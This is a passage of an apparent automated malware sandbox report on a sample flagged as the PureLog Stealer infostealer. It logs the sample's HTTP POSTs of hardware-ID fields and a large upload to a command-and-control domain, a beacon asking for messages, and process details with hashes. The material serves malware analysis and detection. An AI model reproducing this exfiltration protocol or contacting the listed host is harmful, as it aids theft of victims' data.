2025-01-04 21:58:12 UTC	15331	OUT	Data Raw: 2d 2d 30 48 53 47 4e 52 4c 4a 52 55 50 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 43 41 41 43 35 35 39 35 32 33 36 35 32 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 30 48 53 47 4e 52 4c 4a 52 55 50 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 48 53 47 4e 52 4c 4a 52 55 50 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 58 70 4c 59 33 32 2d 2d 0d 0a 2d 2d 30 48 53 47 4e 52 4c 4a 52 55 50 30 49 0d 0a 43 Data Ascii: --0HSGNRLJRUP0IContent-Disposition: form-data; name="hwid"A0CAAC5595236522822D1F4978021086--0HSGNRLJRUP0IContent-Disposition: form-data; name="pid"3--0HSGNRLJRUP0IContent-Disposition: form-data; name="lid"XpLY32----0HSGNRLJRUP0IC
2025-01-04 21:58:12 UTC	5071	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2025-01-04 21:58:13 UTC	1135	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 21:58:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=89pe139p859a0970qf2427b7cp; expires=Wed, 30 Apr 2025 15:44:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mjuxYcre2tcuehYxNGCpR0tZ8XMx%2BG3loSUCdnzxv7C3Ia3Rx%2BKswcZtmbgQ0c7UkwgDNim43OUxjF8fIY6Ju5jZNqLZvfHNSvJGzJVpQ7zT%2FASJXQ0Jbq%2B3JuWvcuvw3%2BAmxMk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fce7d19dc7c8ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1994&rtt_var=753&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21361&delivery_rate=1447694&cwnd=168&unsent_bytes=0&cid=6b323bcd998c86a9&ts=620&x=0"
2025-01-04 21:58:13 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-04 21:58:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	104.21.64.1	443	6664	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 21:58:14 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Y50MEZKPLS8CSHAP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 976 Host: tirepublicerj.shop
2025-01-04 21:58:14 UTC	976	OUT	Data Raw: 2d 2d 59 35 30 4d 45 5a 4b 50 4c 53 38 43 53 48 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 43 41 41 43 35 35 39 35 32 33 36 35 32 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 59 35 30 4d 45 5a 4b 50 4c 53 38 43 53 48 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 35 30 4d 45 5a 4b 50 4c 53 38 43 53 48 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 58 70 4c 59 33 32 2d 2d 0d 0a 2d 2d 59 35 30 4d 45 5a 4b Data Ascii: --Y50MEZKPLS8CSHAPContent-Disposition: form-data; name="hwid"A0CAAC5595236522822D1F4978021086--Y50MEZKPLS8CSHAPContent-Disposition: form-data; name="pid"1--Y50MEZKPLS8CSHAPContent-Disposition: form-data; name="lid"XpLY32----Y50MEZK
2025-01-04 21:58:14 UTC	1132	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 21:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ajn3ooju03eg5nuvbciu3kuvcq; expires=Wed, 30 Apr 2025 15:44:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LFM%2F1aJAcyKpBY4iExFU%2BVR2qVeLlOf51Tp0xW%2BBVxFnRJBMv%2FRI%2BHc4XhMOItu2qsiFK59SyiaDsovlV7tbEmWpolqzOf2oTzsqFPQqtERfvHR49RPivgqw7XBxcdW2el1HvFc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fce7d220da18ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2044&min_rtt=2001&rtt_var=781&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1892&delivery_rate=1459270&cwnd=168&unsent_bytes=0&cid=608f2560eff76d50&ts=479&x=0"
2025-01-04 21:58:14 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-04 21:58:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	104.21.64.1	443	6664	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 21:58:15 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GB16ICI9CGD0FDQ47JL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 550376 Host: tirepublicerj.shop
2025-01-04 21:58:15 UTC	15331	OUT	Data Raw: 2d 2d 47 42 31 36 49 43 49 39 43 47 44 30 46 44 51 34 37 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 43 41 41 43 35 35 39 35 32 33 36 35 32 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 47 42 31 36 49 43 49 39 43 47 44 30 46 44 51 34 37 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 42 31 36 49 43 49 39 43 47 44 30 46 44 51 34 37 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 58 70 4c 59 33 32 2d 2d 0d 0a Data Ascii: --GB16ICI9CGD0FDQ47JLContent-Disposition: form-data; name="hwid"A0CAAC5595236522822D1F4978021086--GB16ICI9CGD0FDQ47JLContent-Disposition: form-data; name="pid"1--GB16ICI9CGD0FDQ47JLContent-Disposition: form-data; name="lid"XpLY32--
2025-01-04 21:58:15 UTC	15331	OUT	Data Raw: 50 82 7f 3f 3b 44 9e 65 d2 fe 81 be f5 8f d3 e8 aa fd b0 11 99 91 89 28 c5 e5 83 d3 79 4b c0 7f 17 4d 13 1b c4 0f a6 7a d1 ac 8d 00 4a f8 a1 78 ce 55 3d 44 76 d5 c5 96 3f 51 4b db ac 0f 6b 35 db 28 fc b5 f0 36 f9 20 3a 01 b5 f9 6e 5b ca 49 06 81 ec c1 7e fc c4 f2 98 b6 f1 12 64 d2 8a 04 4f 91 55 63 8e 02 fa dc ec 51 62 51 12 e2 13 d3 1b 0f 31 cd 27 eb 37 b4 93 be 73 d4 b2 2b a3 43 52 21 0b 3c 59 3e 32 1a 9e 46 1d bd 6d 51 b9 a1 82 a2 96 82 e2 35 7a 5f cb aa 3a 12 e0 a7 62 09 b6 a0 c1 60 34 c0 71 f6 8b ff 9f 8a 64 f9 18 5d 74 eb 27 f0 e3 63 58 b4 bf 0a 9b 5c 8a b6 58 6a d6 c1 03 a8 d3 6a be 4a 94 98 6a 6e df f2 35 33 53 32 7a cf 8e 76 42 91 3f 57 84 e9 a2 45 a6 d4 44 1a 62 23 12 00 39 bb b2 97 7c fc 8d ad 76 fb c8 b1 52 fc 95 e5 07 21 93 92 ed e5 92 ac 18 Data Ascii: P?;De(yKMzJxU=Dv?QKk5(6 :n[I~dOUcQbQ1'7s+CR!<Y>2FmQ5z_:b`4qd]t'cX\XjjJjn53S2zvB?WEDb#9\|vR!
2025-01-04 21:58:15 UTC	15331	OUT	Data Raw: 85 ae 44 64 8e c5 11 71 75 a4 31 e1 5f 55 e1 a2 d1 d8 b8 a8 83 6a de 56 76 d1 39 5e 7b 3a 4d 67 90 6b 43 c6 93 6a 61 7a e6 08 46 53 ba 55 3d c7 e8 da b6 f3 d2 97 3b 26 9d 34 60 ed b3 54 22 28 12 7b 8f 16 88 02 6d a0 fa 3c 3c 4c 75 83 4a 50 04 24 b1 57 24 74 3b cc 1c 7a 6f 47 30 3e 97 e8 0f 2f a6 7c 0e 4e 74 bc ff 92 5d fa fe e3 8c db db 85 57 72 9b c6 03 8f 07 97 f8 a9 e5 37 a9 b4 4f 8c 42 fe d2 dd d3 fe 1e fb 04 50 21 b2 54 63 fa 56 83 bb dd 19 45 10 5a 92 15 9c 14 7a 40 af 90 37 f6 48 f7 fd b4 a8 4a 64 44 34 9d 1f c4 5f 1c ad 52 81 da 1a 0a b1 41 c1 5e 13 d8 75 7f bd 33 c9 89 26 62 ca c8 60 f3 63 de 51 91 c9 6f a6 26 e0 ce 48 0a 4a 7e 89 7e 3f 87 80 ca e9 a5 69 72 be 36 73 5c 36 1a da 40 7d 1f 77 4e 5b cb 39 59 95 bc bf b5 84 4f 4c e6 56 3a bb 80 1a 40 Data Ascii: Ddqu1_UjVv9^{:MgkCjazFSU=;&4`T"({m<<LuJP$W$t;zoG0>/\|Nt]Wr7OBP!TcVEZz@7HJdD4_RA^u3&b`cQo&HJ~~?ir6s\6@}wN[9YOLV:@
2025-01-04 21:58:15 UTC	15331	OUT	Data Raw: fb b1 50 0c 24 fe 33 83 df 8b 14 74 f8 33 cc 54 6b 1c de c9 72 f5 30 7d 5f ff aa cb f8 ef ac c1 ca 7e dc 42 ba a7 0c 78 db 86 1a c0 83 da 59 89 5b a8 b1 35 4d 2c 7c b0 e2 1e 60 94 46 c9 33 89 88 56 b6 22 27 60 71 69 e1 15 43 18 56 cc 48 0d 0f 14 cf 63 2a b9 fa 4a 24 f9 81 33 8a dc 82 9f 19 74 fb 6c 3b 54 95 d4 b0 73 53 76 92 41 b0 da b2 47 69 83 50 f7 cf ff 2c 2b 4b 9f 78 60 c2 fe 45 d0 f5 67 c4 f7 d2 c1 ac 1a 88 83 c4 e7 f7 23 93 bf b0 27 1e a1 c8 b9 46 95 c1 87 96 a6 7a 2f bb bc bd f8 bc a0 8c f7 f3 9d cb 57 4b 62 0c d9 f1 8f 29 b2 ed a2 f7 95 c6 b9 de 4e b7 1a 93 c9 c6 da 58 88 e3 e9 1d 5b 86 92 f9 bc 55 da e2 36 a3 1b 6f 6a ac 81 0a 3a 29 69 d1 a8 e0 06 84 51 ae 57 89 11 3a 61 d2 ab 9f 0a 92 92 93 3e 38 97 97 74 09 e8 93 9e a3 9b f6 52 22 c9 24 99 b6 Data Ascii: P$3t3Tkr0}_~BxY[5M,\|`F3V"'`qiCVHc*J$3tl;TsSvAGiP,+Kx`Eg#'Fz/WKb)NX[U6oj:)iQW:a>8tR"$
2025-01-04 21:58:15 UTC	15331	OUT	Data Raw: 08 99 b3 b8 dc f8 ee 02 67 bd 80 28 91 56 17 41 69 03 52 98 16 17 35 6b 7c af 74 90 da b3 b0 53 23 1f 7e 71 33 07 46 ab b0 a1 09 cc 7a f5 a9 ca c3 27 74 03 de 4b a4 7f ee d2 de c7 b5 77 de 48 0a ff a2 3a 85 53 f2 d5 71 91 ef da 51 c9 65 c8 fb 8b f4 60 a4 62 b7 c2 15 37 e8 88 f0 fd 83 2e 2e db df 1f 59 39 14 fa 70 0d 56 6a b3 8a 80 a9 63 d8 7d d6 c7 95 28 a2 4d b7 a7 6f ca bc 86 b4 e7 e5 7a d6 67 8d d6 bb f3 ad 71 35 df 7b 3d 06 42 47 8b 24 b5 d3 e4 d1 b4 c2 f3 e5 5b 17 e2 b4 32 04 4a 63 6f 25 1d 9b 0b 6a 78 fa 6e 50 3a 2f e1 0c e1 4f 65 e3 ec be f1 8f e4 64 9a 75 56 cd 0d ce bf eb 19 c3 6f 3c 8e 1c 76 01 e4 5a 63 60 68 5c 5d 3c 22 28 82 1e fb c4 4e 2c ff e7 33 3c 79 c1 e1 b3 c2 75 e1 3b 60 0b 3f 6d 37 93 09 f2 d7 ba fa 07 0d 86 89 72 91 a5 38 d9 fa d6 9c Data Ascii: g(VAiR5k\|tS#~q3Fz'tKwH:SqQe`b7..Y9pVjc}(Mozgq5{=BG$[2Jco%jxnP:/OeduVo<vZc`h\]<"(N,3<yu;`?m7r8
2025-01-04 21:58:15 UTC	15331	OUT	Data Raw: 56 e7 0a 14 9f d9 2f ba 7b bd 23 98 17 1a 16 fe ad eb 10 2e 0e 8c a9 a8 b2 ca b3 18 b8 c2 16 e1 21 c4 ac aa a7 13 37 de 5e 90 18 9a 77 88 b8 6d 06 d1 42 8b f3 8c ec 51 c6 3b 55 c1 1d 57 08 85 e9 1a fa d4 92 76 79 03 f7 2c 5c 51 bf f5 fe b0 7c 1f 6c 8e 69 db df 59 27 3d 18 06 82 a8 2c 6f c1 6e 82 e8 59 82 45 b6 82 cc 9d 8d 43 99 97 66 8b c4 04 e6 36 4a 6f f0 70 52 7d d4 b8 82 a8 5c 17 d7 cd 2f 80 1c 1f d4 ea 53 82 e0 25 cf 27 80 c0 7c da e0 0c ca 3a 87 1b 0d 40 d9 53 65 5e 48 fb 84 5c 30 1c e4 0e 35 94 89 47 11 e6 ae 7e 25 fd b0 50 4f bd 13 1d 2b 60 fa 1a 10 86 da 94 0b 38 e7 79 16 c1 b8 f1 29 c7 98 88 29 01 64 5a 57 59 ee cb 7c 9c 48 60 c5 8c 71 ae b1 24 bd 1d 65 36 b0 eb 1d 76 05 c5 68 1f 39 b7 82 3c 60 e3 86 3a 8d 09 c2 04 f0 4c e2 a7 8e f2 78 ca dd e6 Data Ascii: V/{#.!7^wmBQ;UWvy,\Q\|liY'=,onYECf6JopR}\/S%'\|:@Se^H\05G~%PO+`8y))dZWY\|H`q$e6vh9<`:Lx
2025-01-04 21:58:15 UTC	15331	OUT	Data Raw: c8 ec 91 7e 6e 17 3d 47 bc 9b 12 b9 61 9d 6f fa d6 ee 2a 44 b3 c0 75 3f 85 18 b4 d8 9e dd 7e 2c 7f d5 17 ef ca fd 6c c0 0d 56 a9 f1 02 5f 38 70 94 60 1b 87 fb 33 13 18 12 9d fc 72 5c ff af 51 a7 8c 38 08 9d 6c bc f8 50 e7 c2 b9 25 7f ac f2 b6 e5 6f 99 d8 3f 45 66 a8 55 b1 57 fe 13 c8 77 26 42 2e 7b 3f fc ba e0 b2 b7 e9 a8 50 25 2f 9c 8b 53 39 ea 66 88 3c e9 f8 67 84 24 c0 b5 10 6c a7 03 49 6b cf 7f c1 37 9e ca 4c 17 30 e6 65 16 0f fd 9e e2 39 a4 d3 91 8c 08 91 60 cb a6 7b f8 fd bf f9 69 37 76 6f 8a 53 47 78 ba ad b5 7e 42 84 c9 ae ec c3 e7 4b 40 77 ce 3f 79 2e d9 b3 f2 51 06 70 d8 2a de a5 04 a4 dd 9f 38 23 43 dc e1 14 d7 30 51 20 cc 3c 1b f6 bf c6 08 3a ff ee e1 af bc ef d2 12 e6 8f 9b fc 90 30 72 a9 0a 28 78 0b 5f e7 1b 28 86 c0 39 c0 f1 4f ad 95 28 19 Data Ascii: ~n=GaoDu?~,lV_8p`3r\Q8lP%o?EfUWw&B.{?P%/S9f<g$lIk7L0e9`{i7voSGx~BK@w?y.Qp8#C0Q <:0r(x_(9O(
2025-01-04 21:58:15 UTC	15331	OUT	Data Raw: 27 50 9a b2 ec 62 82 d7 43 71 2f 49 08 f5 49 f8 f9 81 68 c6 02 4c a7 28 93 93 43 ef 25 21 be 23 db 37 c9 c1 29 04 a6 d8 14 7a 2a 05 77 37 05 5f 03 fc b9 d2 04 4b 53 6d ac bf 18 c6 68 76 c3 f1 96 b2 a4 f7 9b 76 d7 61 83 13 29 0f 95 6c 1c 62 82 0e 63 bb 0a 2e c7 ba e5 25 56 6d ef 9e 58 76 fc 81 b4 37 9c 7d ec 27 6f 85 bb 25 4e 40 c4 dc 99 72 c1 e3 2e e8 3c 68 0b d3 5d 4d fd 4a 51 dd e9 6e 2f 29 fe f4 84 1c e6 65 77 e2 60 61 44 12 d7 5b 53 0e f5 57 6a 12 13 7e d3 c4 ba cf 0a 31 82 f9 8f 0d 35 1b c6 45 dc dd 4e 5c b9 5c d8 56 1d ad ca ec be e8 52 5b b2 0a 29 3c 8e 35 43 e5 dd 59 e8 3b ad 6a 2f 4b ec 53 48 34 4c 46 da 09 36 28 78 e0 dd 79 a7 30 be 25 4a fd 66 f4 6c b1 48 f0 0d 5a 38 32 61 95 51 50 6c 14 cf 49 26 13 4e 0b af ef 61 e8 8c 27 3c 7f 45 56 94 8b e0 Data Ascii: 'PbCq/IIhL(C%!#7)z*w7_KSmhvva)lbc.%VmXv7}'o%N@r.<h]MJQn/)ew`aD[SWj~15EN\\VR[)<5CY;j/KSH4LF6(xy0%JflHZ82aQPlI&Na'<EV
2025-01-04 21:58:15 UTC	15331	OUT	Data Raw: 78 c0 53 17 77 bf d2 7f 3a 80 4a c2 16 89 d2 2c f7 20 8b e6 83 2c 13 e8 37 fd 70 80 38 5d 31 6a df 59 b5 c6 77 77 33 e2 6b 75 94 14 33 78 fe 78 77 60 a2 1d 20 eb 21 c4 11 bf a4 c3 1f 49 44 8b 35 9b c9 2c ac 4b 4d 44 e7 e0 89 f8 df 67 49 f7 d8 8e 01 19 c5 48 b5 11 65 f5 6d 17 3e 9e 18 62 6c 6d a9 39 b7 5f 4b 3b 32 0c 15 1c d8 60 dc cd c7 af 14 41 72 ae d3 3f 5b a7 bb 7d 39 47 83 be 96 2b 54 e3 7f 29 23 4d c3 09 af 69 86 5f 18 17 fb 58 08 fc ee 67 cc 8a f3 9b de 28 51 0c 4f 33 33 49 0c 1b af 7a 6c 11 b1 9a 4b 78 30 b8 ad af ce af 0b db 85 1a 52 b0 c1 13 e3 19 f8 5a e3 70 c5 15 22 4c ca 85 04 4f ca c8 16 1f 54 4a 91 cf 6e 35 15 e0 e3 5b de bb ab c5 7e b7 7c 94 ba 44 c7 32 45 a5 45 b6 45 29 3d 9a e7 4c c1 34 75 4e bb 34 3c c9 bf 8d a9 2c d5 a9 e3 2b 2e da 25 Data Ascii: xSw:J, ,7p8]1jYww3ku3xxw` !ID5,KMDgIHem>blm9_K;2`Ar?[}9G+T)#Mi_Xg(QO33IzlKx0RZp"LOTJn5[~\|D2EEE)=L4uN4<,+.%
2025-01-04 21:58:15 UTC	15331	OUT	Data Raw: c5 3c 3f b0 ad 14 99 34 4d 35 bf bb c1 79 6e b4 2b e4 df 4b 78 a4 ee 18 31 41 b3 e6 98 c3 35 96 47 db fe 2f 66 55 4a 3e 50 35 86 b0 7c 6d 0b 98 fe 78 e0 42 19 a0 bf bf aa 0e 0a 18 3d bd e6 80 d2 fb 4f fc 7e 77 75 56 e1 71 fa 7b 40 16 60 19 a0 c3 fc 5b 29 3f 8f 92 a3 43 67 60 ca 5b e3 52 5e f5 87 b3 97 80 8e 1f 8c cd d9 33 15 9f 47 f2 04 c2 53 98 cd 63 9d 82 52 bb c0 cb b7 8a 4b dc 15 c1 df e5 9f d6 f1 08 76 21 20 e4 91 04 a0 a2 7d f6 90 e2 8b 2a 7e f6 5e 44 ca 9d 35 51 d4 79 c5 59 b2 4a fd 1d e3 94 9c 8c f7 92 85 eb 46 9d 85 20 21 23 9e 18 cf 8c ff 9d 96 b7 05 4c e6 92 cb 56 4f 19 ac c4 0b 93 73 e3 c3 58 2b 90 e8 2d 7d d8 17 b7 66 6c c0 22 f6 21 ff 42 82 fb 3f 07 fb 88 70 2e d2 db eb fe 1d ee c6 a2 09 81 b5 fd 10 cb 54 79 e7 c0 96 0c 45 de 9e cc 68 b8 c1 Data Ascii: <?4M5yn+Kx1A5G/fUJ>P5\|mxB=O~wuVq{@`[)?Cg`[R^3GScRKv! }*~^D5QyYJF !#LVOsX+-}fl"!B?p.TyEh
2025-01-04 21:58:16 UTC	1133	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 21:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ag9f4rng2kum6dn6surmo5benv; expires=Wed, 30 Apr 2025 15:44:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=asKyvq%2FP%2Br8yWlLQVafL8GU0LSwg5iavBbEI2NO2bZgPi04aXrimpRNruqioV6Dy9DvXJ8nNdUw9LivhYWthTAKXqGgiGgP0s13jtOQ9i9hpBwgaRcOUY6llgfLkoIGUxZsTzPI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fce7d2a3f088ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1942&rtt_var=740&sent=319&recv=575&lost=0&retrans=0&sent_bytes=2845&recv_bytes=552860&delivery_rate=1466599&cwnd=168&unsent_bytes=0&cid=322ba32cd702dff3&ts=1530&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	104.21.64.1	443	6664	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 21:58:17 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: tirepublicerj.shop
2025-01-04 21:58:17 UTC	77	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 58 70 4c 59 33 32 2d 2d 26 6a 3d 26 68 77 69 64 3d 41 30 43 41 41 43 35 35 39 35 32 33 36 35 32 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 Data Ascii: act=get_message&ver=4.0&lid=XpLY32--&j=&hwid=A0CAAC5595236522822D1F4978021086
2025-01-04 21:58:17 UTC	1127	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 21:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=arlin49ofpcddmv39ti4kl55gn; expires=Wed, 30 Apr 2025 15:44:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FEwUEQsVbRPbAvRgvFdCqTx9yieYOciKZu5qEIUqbd9t9rh1%2B2mRgQocpzmTJxBVWnk3kjfCxzCSbkWkVhITP%2FEX8HrKy1943%2BToD4ZQhj52U1RPahhGxQY7nCiylQPv0gZ1AWM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fce7d36fd6c8ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1933&min_rtt=1931&rtt_var=728&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=979&delivery_rate=1498204&cwnd=168&unsent_bytes=0&cid=d2766018f465cb9f&ts=465&x=0"
2025-01-04 21:58:17 UTC	54	IN	Data Raw: 33 30 0d 0a 65 32 2b 6c 31 45 53 37 36 66 57 63 78 76 4f 31 74 53 6e 53 30 6e 6f 41 55 76 4f 59 59 67 75 32 48 68 31 63 42 6b 69 36 33 78 41 67 4d 67 3d 3d 0d 0a Data Ascii: 30e2+l1ES76fWcxvO1tSnS0noAUvOYYgu2Hh1cBki63xAgMg==
2025-01-04 21:58:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	16:58:06
Start date:	04/01/2025
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x100000
File size:	390'696 bytes
MD5 hash:	E9F13D0B330A73ECE569B6115D2AC4F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1771192716.0000000000102000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	16:58:06
Start date:	04/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:58:06
Start date:	04/01/2025
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
